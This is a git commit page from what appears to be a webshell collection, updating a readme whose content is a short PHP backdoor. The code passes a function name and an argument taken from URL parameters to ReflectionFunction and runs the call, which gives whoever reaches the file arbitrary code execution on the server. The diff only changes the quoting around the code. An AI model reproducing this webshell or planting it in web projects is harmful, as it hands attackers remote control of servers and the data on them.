update readme.md

This commit is contained in:
tennc 2014-07-28 10:09:59 +08:00
parent 8d36b81c1b
commit c77a9dad29

View file

@ -6,9 +6,9 @@
*************************************************** ***************************************************
code: code:
'<?php <?php
$func = new ReflectionFunction($_GET[m]); $func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c])); echo $func->invokeArgs(array($_GET[c]));
?>' ?>
*************************************************** ***************************************************